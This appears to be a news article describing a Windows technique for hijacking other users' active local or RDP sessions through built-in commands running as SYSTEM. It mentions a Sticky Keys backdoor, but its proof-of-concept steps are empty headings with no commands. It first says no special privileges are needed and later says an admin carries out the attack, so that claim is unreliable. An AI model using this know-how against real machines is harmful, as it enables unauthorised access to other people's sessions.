Recently, a security researcher, Alexander Korznikov, has found a way to log into any account on the same computer, even without knowing its password. This technique works on all Windows versions and doesn’t require special privileges. The researcher can’t figure out if it’s a Windows feature or security flaw.
The researcher calls the attack as “privilege escalation and session hijacking.” This attack can also be performed via an RDP session, escalating the attacker’s access to user accounts.
Hijacking active user/RDP session
The simple trick behind the attack is that any user can use inbuilt Windows CLI commands to escalate his access and switch to any other active user session on the PC.
However, the attack won’t work if the targeted account is not logged in on the same machine.
The attacker can execute some cmd.exe commands and then select the active user session to log into. This attack not only works with local user sessions, but also with RDP sessions.
Sticky Keys (cmd backdoor) at windows login screen runs with NT AUTHORITY/SYSTEM. They have Full Control access permission, and can connect to every user session without asking for a password.
The most surprising thing is that the legit user isn’t asked for logout. So, by using this technique the user just will be kicked out of the session without any notification.
Its Trivial to Execute for Attackers
A privileged user can gain command execution with NT AUTHORITY/SYSTEM rights. And also can hijack any currently logged in user’s session, without any knowledge about his credentials.Terminal Services session can be either in connected or disconnected state.
Furthermore, tools like metasploit, incognito, mimikatz etc, used for manipulating and impersonating logged in users for user’s token are no more required for attackers.
Everything is done with built-in commands. Every admin can impersonate any logged in user either locally with physical access or remotely via Remote Desktops.
Kevin Beaumont confirmed and tested this attack on Windows 2016, Windows 2012 R2, Windows 2008, Windows 10 and Windows 7.
Proof Of Concept
The whole attack takes about one minute to perform and doesn’t include many steps.
1. Windows 7 via Task Manager :
2. Windows 7 via command line :
3. Windows 2012 R2 via service creation :
However, Korznikov discovery isn’t entirely new but appears to be an expanded version of an older attack. Back in 2011, Benjamin Delpy, a security researcher for the Bank of France, detailed the very same user session hijacking technique on his blog, albeit in French.
Furthermore, Microsoft didn’t find out about this issue in the past six years. It’s very likely that they didn’t consider it a security flaw, and deemed this was how Windows was supposed to behave.